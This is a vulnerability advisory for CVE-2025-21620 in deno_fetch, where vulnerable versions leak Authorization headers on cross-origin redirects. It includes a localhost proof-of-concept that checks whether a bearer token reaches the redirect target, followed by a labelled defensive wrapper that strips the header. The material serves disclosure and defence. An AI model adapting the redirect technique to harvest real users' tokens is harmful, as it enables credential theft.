Information Exposure Affecting deno_fetch package, versions <0.204.0


Severity: medium

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of concept

  • Snyk ID: SNYK-RUST-DENOFETCH-8602524
  • Published: 7 Jan 2025
  • Disclosed: 6 Jan 2025
  • Credit: Unknown

Introduced: 6 Jan 2025

CVE-2025-21620
CWE-200

How to fix?

Upgrade deno_fetch to version 0.204.0 or higher.

Overview

Affected versions of this package are vulnerable to Information Exposure due to improper handling of HTTP headers during cross-origin redirects: request headers such as Authorization are forwarded to the redirect target even when it is on a different origin, so a server that can issue a redirect can obtain sensitive information such as authentication tokens.

PoC

// One AbortController shuts both test servers down once the check has run.
const ac = new AbortController()

// Server 1 answers every request with a 302 to a different origin (port 3002).
const server1 = Deno.serve({ port: 3001, signal: ac.signal }, (req) => {
  return new Response(null, {
    status: 302,
    headers: {
      'location': 'http://localhost:3002/redirected'
    },
  })
})

// Server 2 is the redirect target; it reports whether the Authorization header
// sent to server 1 was forwarded to it across the origin boundary.
const server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) => {
  const body = JSON.stringify({
    url: req.url,
    hasAuth: req.headers.has('authorization'),
  })
  return new Response(body, {
    status: 200,
    headers: {'content-type': 'application/json'},
  })
})

async function main() {
  // Send a bearer token to server 1; fetch follows the redirect automatically.
  const response = await fetch("http://localhost:3001/", {
    headers: {authorization: 'Bearer foo'}
  })
  const body = await response.json()

  ac.abort()

  // Vulnerable versions (< 0.204.0) print ERROR here; fixed versions print SUCCESS.
  if (body.hasAuth) {
    console.error('ERROR: Authorization header should not be present after cross-origin redirect')
  } else {
    console.log('SUCCESS: Authorization header is not present after cross-origin redirect')
  }
}

// Give both servers a moment to start listening before issuing the request.
setTimeout(main, 500)
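As an added example (not part of this advisory and not code from deno_fetch), the following wrapper shows the behaviour the PoC expects, implemented in application code: it follows redirects by hand with redirect: 'manual' and drops the Authorization header whenever a hop changes origin, which is what the Fetch standard requires. It assumes only the Web APIs URL, Headers, Response and fetch (Deno or Node 18+); the names isCrossOrigin, headersForRedirect and safeFetch are chosen here.

```javascript
const MAX_REDIRECTS = 20;
const REDIRECT_STATUSES = new Set([301, 302, 303, 307, 308]);

// Same origin means same scheme, host and port; URL.origin normalises default ports.
function isCrossOrigin(fromUrl, toUrl) {
  return new URL(fromUrl).origin !== new URL(toUrl).origin;
}

// Header set for the next hop: Authorization (the header the PoC shows leaking) is
// dropped when the hop changes origin, as the Fetch standard requires; the rest is kept.
function headersForRedirect(headers, fromUrl, toUrl) {
  const next = new Headers(headers);
  if (isCrossOrigin(fromUrl, toUrl)) next.delete('authorization');
  return next;
}

// Follows redirects by hand with redirect: 'manual' so every hop passes through
// headersForRedirect. fetchImpl is injectable so the logic can be exercised offline.
// Only the header rule is modelled; method and body are passed through unchanged.
async function safeFetch(url, init = {}, fetchImpl = fetch) {
  let currentUrl = new URL(url).href;
  let headers = new Headers(init.headers);
  for (let hop = 0; hop <= MAX_REDIRECTS; hop++) {
    const res = await fetchImpl(currentUrl, { ...init, headers, redirect: 'manual' });
    const location = res.headers.get('location');
    if (!REDIRECT_STATUSES.has(res.status) || location === null) return res;
    const nextUrl = new URL(location, currentUrl).href; // Location may be relative
    headers = headersForRedirect(headers, currentUrl, nextUrl);
    currentUrl = nextUrl;
  }
  throw new Error(`more than ${MAX_REDIRECTS} redirects`);
}
```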
